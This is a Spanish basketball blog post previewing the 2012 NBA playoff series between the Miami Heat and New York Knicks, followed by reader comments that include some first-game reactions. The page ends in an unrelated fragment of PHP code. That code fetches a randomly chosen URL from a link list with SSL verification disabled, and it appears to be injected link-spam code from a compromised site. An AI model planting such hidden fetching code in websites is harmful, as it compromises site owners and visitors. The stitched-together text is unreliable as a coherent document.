Análisis: Miami Heat (2) vs New York Knicks (7)

28 de April de 2012 por melo15

Regular: 3-0

Heat: 98.5 PF – 92.5 PC
Knicks: 97.8 PF – 94.7

Hace dos meses el pronóstico sobre esta eliminatoria habría sido de 4-0 para los de Florida y derrota humillante para los de la Gran Manzana. Pero desde el despido de Mike D’Antoni algo ha cambiado en Nueva York. Con Mike Woodson este equipo es capaz de mirarle a la cara a cualquier otro conjunto de la liga. La serie se prevé más igualada de lo que pudiera parecer en un primer momento, con un Carmelo Anthony en estado de gracia y un banquillo neoyorkino cada día más decisivo. Los Beach Boys no lo van a tener fácil si quieren pasar de ronda pero presentan una de las defensas más temibles del campeonato y al trío de jugadores más decisivo de la liga.

Claves de la eliminatoria

Carmelo vs LeBron: A priori el duelo más interesante de esta serie. Si Carmelo Anthony sigue jugando al nivel de estos últimos meses los Knicks pueden plantarle cara a Miami. Pero no hay que olvidar que enfrente tendrá a LeBron, uno de los mejores defensores perimetrales de la NBA y un portento en ataque.

Tyson Chandler: El segunda espada del equipo de la Gran Manzana. Desde la defensa siempre se ha mostrado decisivo, el año pasado en Dallas, hace 5 años en New Orleans… De su buen hacer dependerá gran parte de esta eliminatoria.

Banquillo: Todos sabemos que el banquillo de los Heat es uno de los peores entre los equipos aspirantes al anillo. Haslem, Cole, Battier y Turiaf parecen bastante poco comparado con el banquillo de los Knicks, con Fields, Smith, Harrelson, Novak y Douglas.

Defensa, defensa y… defensa: Todos sabemos que los Knicks son, probablemente, uno de los mejores equipos ofensivamente. Por eso los de Florida deben concentrarse en la defensa, uno de sus puntos fuertes y el más decisivo en Playoffs.

Los tres mosqueteros: LeBron, Wade y Bosh. De sus actuaciones individuales va a depender gran parte de esta eliminatoria. El miedo a los finales apretados de LeBron y la alergia a la pintura de Bosh son temores que hay que superar si quieren ganar esta serie.

Pronóstico

4-2 Miami Heat

Calendario (hora española)

Partido 1 – Sábado 28 de abril en Miami (21h30)
Partido 2 – Martes 1 de mayo en Miami (02h00)
Partido 3 – Viernes 4 de mayo en New York (02h00)
Partido 4 – Domingo 6 de mayo en New York (21h30)
Partido 5 – Miércoles 9 de mayo en Miami
Partido 6 – Viernes 11 de mayo en New York
Partido 7 – Domingo 13 de mayo en Miami

Comenta

21 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Melo, te olvidas claramente de los cuartos horribilis que suelen tener los Knicks, en los que no defienden nada y de repente se les olvida dar pases, meter balones en la zona, etc. Y eso también está pasando con Woodson, no solo con D’Antoni. Dudo mucho de que la segunda unidad de Knicks dé el callo como hasta ahora. En el Madison pueden ganar uno o los dos primeros partidos para empatar la serie a 2, pero llevan tantos siglos sin competir por algo que no creo que puedan sobreponerse a la gran tensión competitiva de los Heat… Mi pronóstico es un 4-1

      Citar

  2. MagicJohnson32 dice:
    #2

    Tengo ganas de ver el primer Melo vs LeBron en Playoffs. Si los Knicks consiguen focalizar el juego en un duelo individual, pueden dar problemas a los Heat. Los triples de JR y Novak pueden ganar algún partido, siempre que Chandler y Amaré se impongan al juego interior de Miami, que deberían.

    No sé, es difícil, por no decir imposible, apostar contra los Heat, pero creo que va a ser una eliminatoria bonita.

      Citar

  3. melo15 dice:
    #3

    Si el juego interior de los Knicks funciona los Heat van a tener muchos problemas, Bosh solo no puede parar a Stat y Chandler, ademas Shumpert puede hacer un buen trabajo sobre Wade que lleva toda la temporada arrastrando lesiones y si JR Smith esta fino puede darle muchos problemas a los Heat. Yo veo un 4-3 a favor de Miami.

      Citar

  4. Sancho88 dice:
    #4

    JAJAJAJAJ, ERES SORPRENDENTE MELO. osea, que en el análisis pones 4-2 y ahora pasan las horas y te vas creciendo y le pones una victoria más a los Knicks no? Deduzco que esta noche los Knicks eliminan a los Heat 4-3 y para el lunes va rosquito para los Knicks 4-0… xd

      Citar

  5. German dice:
    #5

    Gran serie a priori, quisiera que sea muy igualada pero lamentablemente veo a Miami claro favorito. Los Knicks van a necesitar a un gran Chandler (no dudo de el) pero muy bien acompañado por Stat y Melo (con este buen nivel que tiene ultimamente). Si Lebron anula a Melo, los Knicks necesitaran la ayuda indispensable de la banca y estar en un dia inspirados…

    Miami 4-1

      Citar

  6. melo15 dice:
    #6

    Yo simpre he pensado en la posibilidades de los knciks, pero no queria que me lloviesen palos.
    @German a Melo no se le anula, se le molesta, yo creo que la clave de la eliminatoria es Stat, no dudo de Melo y Chandler, pero si Stat esta bien yo apuesto por la victoria de los Knicks.

      Citar

  7. diestro dice:
    #7

    Segun dice Daimiel en su analisis Chandler esta con gripe. De ser asi 4-0 para los heat.

      Citar

  8. rumbero dice:
    #8

    Creo que coincimos casi todos en los mismos puntos. La banca de los Knicks se prevee fundamental en las opciones que puedan tener. Una de los mejores pero a la vez más inconsistentes de toda la liga. Con la intensidad que van a meter los Heat, sino consiguen aportar con continuidad en los dos lados de la pista se les puede complicar el tema.
    Luego parece claro que Chandler va dar ese plus sobretodo en defensa, ahora bien, un presumible duelo Bosh – Amare no lo veo tan favorable para el segundo como comentais.
    Y el duelo Lebron-Carmelo. Con el nivel que está mostrando Melo últimamente puede estar muy entretenido. Todo lo que sea llegar a un final de partido apretado y con protagonismo para estos dos, puede jugar a favor de los Knicks.
    4-2 para Miami

      Citar

  9. MagicJohnson32 dice:
    #9

    diestro:
    Segun dice Daimiel en su analisis Chandler esta con gripe. De ser asi 4-0 para los heat.

    ¿Alguien piensa de verdad que Chandler se va a perder un partido por una gripe? No way…

      Citar

  10. Heineken dice:
    #10

    No se a quien le tengo más tirria… si a Carmelo o a LeBron jajaja
    Venga, me la juego diciendo que los Knicks dan la sorpresa y pasan la eliminatoria con un 3-4 por culpa del “canguelo”de LeBron en los finales de partido xD.

      Citar

  11. Nacho dice:
    #11

    Yo creo que es difícil aventurarse para un lado o para otro. En principio puede estar igualada la cosa, pero…
    Hay algo que está claro si los Heat (me cuesta decir eso de “el Heat”) están en mos On durante el partido, y ganan por aplastamiento,,, (se entiende defensa brutal, contraataques claros, de 20 al inicio del tercer cuarto) los de la gran manzana a lo sumo (y es mucho decir) gana dos partidos. Pero como los de Florida tonteen, y no machaquen, con un último cuarto igualado, Melo & Company son favoritos. Creo que esa es la clave. De hecho, creo que esa es la clave de Miami todas la series de su conferencia. Por aplastamiento son superiores (muy superiores) a todos, pero como caigan en alguna encerrona, no sé si podrán salir de ella.
    Sería bonito un 4-3 para los Knicks, y que Lin pudiese jugar en PO, pero va a ser que no. 4-1 4-2, para “El Calooooor”

      Citar

  12. Jose Luis dice:
    #12

    Los Knicks también se han convertido en una de las mejores defensas de la liga. Sólo permiten 2 puntos más que el Heat, y eso teniendo en cuenta toda la temporada, la mitad de ella con Mike D’Antoni… aún así, 4-2.

      Citar

  13. rumbero dice:
    #13

    Con un ojo medio puesto en el partido parece que Lebron y Miami estan en modo demolición. +20 y 1-0 para James en el duelo con Melo. Lin vuelve!!

      Citar

  14. Jose Luis dice:
    #14

    El atraco a New York está siendo de escándalo, twitter echa humo, todos los analistas y periodistas diciendo. LeBron en modo teatrero. Aunque también es cierto que están jugando una gran defensa. Pero esta diferencia de +26 que hay ahora mismo, no sería ni 10 si los árbitros hubieran sido medio-imparciales

      Citar

  15. Jose Luis dice:
    #15

    Y Shumpert cae al suelo, algo parecido a lo de Rose parece en un primer momento… por dios, espero que ambas cosas se queden en nada.

      Citar

  16. Lucho dice:
    #16

    Pronostique 4-1
    Terrible paliza esta siendo este primer partido

      Citar

  17. Nacho dice:
    #17

    Hombre, los árbitros han estado caseros, LeBron es gilip.. y payaso. Lo rozan y le pitan falta (hoy una sin rozarle siquiera), pero vamos Miami se ha merendado a NY porque se los ha merendado, con árbitros o sin ellos. El segundo cuarto ha sido brutal, y en el primero que parecían parejas las cosas iban de 8, osea que… blanco y en botella. Hoy tremendamente superiores Miami. Carmelo nefasto, un poco Stat al principio y brutalidad de pérdidas, como quieran agarrarse a lo de los árbitros me parecería patético. Lo único bonico, por parte de los de la gran manzana, el inicio de Baron Davis, parecía el de GSW.

      Citar

  18. Denise dice:
    #18

    En Playoffs es donde los hombres (Lebron) se diferencian de los niñatos (Melo).
    Según los últimos rumores, Melo va a pasar todo el domingo acostadito con Chandler para que le pegue la fiebre y evitarse jugar y ser humillado nuevamente por Lebron.

      Citar

  19. Nacho dice:
    #19

    Denise:
    En Playoffs es donde los hombres (Lebron) se diferencian de los niñatos (Melo).
    Según los últimos rumores, Melo va a pasar todo el domingo acostadito con Chandler para que le pegue la fiebre y evitarse jugar y ser humillado nuevamente por Lebron.

    Pues tendrá que demostrar este año que es un hombre, porque hasta ahora…

      Citar

  20. simon dice:
    #20

    Denise:
    En Playoffs es donde los hombres (Lebron) se diferencian de los niñatos (Melo).
    Según los últimos rumores, Melo va a pasar todo el domingo acostadito con Chandler para que le pegue la fiebre y evitarse jugar y ser humillado nuevamente por Lebron.

    Nacho: Pues tendrá que demostrar este año que es un hombre, porque hasta ahora…

    Ni uno ni el otro… Lebrón es un tipo con fama de cagón y puede ser verdad pero demostrar creo que ha demostrado en Cleveland que es un hombre. Finales de la NBA y finales de conferencia con un equipo que quitandole a él, quizá estariamos hablando de que estos Bobcats se quedaron a punto de superar a los Cavs del 2007 como peor equipo de la historia jejeje.
    Y por otro Denise macho vengo de ver tu comentario de quejas contra los Haters de Nelson ( que sinceramente no veo ninguno en el blog pero bueno como tu veas… ) y veo un comentario de Haters total contra Anthony y encima ventajista tras un mal partido de Anthony, Knicks no va a ganar la eliminatoria ni aunque se jugara al mejor de 100 partidos pero lo mismo si recibes un owned por parte de Melo. y yo no soy muy “melista” pero te has animado a hacer ese comentario tras el horroroso partido de ayer, no te he visto comentar en el ultimo mes y medio donde Melo ha estado a nivel de MVP.

      Citar

  21. German dice:
    #21

    melo15:
    Yo simpre he pensado en la posibilidades de los knciks, pero no queria que me lloviesen palos.
    @German a Melo no se le anula, se le molesta, yo creo que la clave de la eliminatoria es Stat, no dudo de Melo y Chandler, pero si Stat esta bien yo apuesto por la victoria de los Knicks.

    Ayer lo han anulado completamente. No es facil pero puede pasar. Inexplicable lo hecho por los Knicks, esto es largo y recien empieza pero si bien contaba con victoria de Miami, nunca tan facil.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>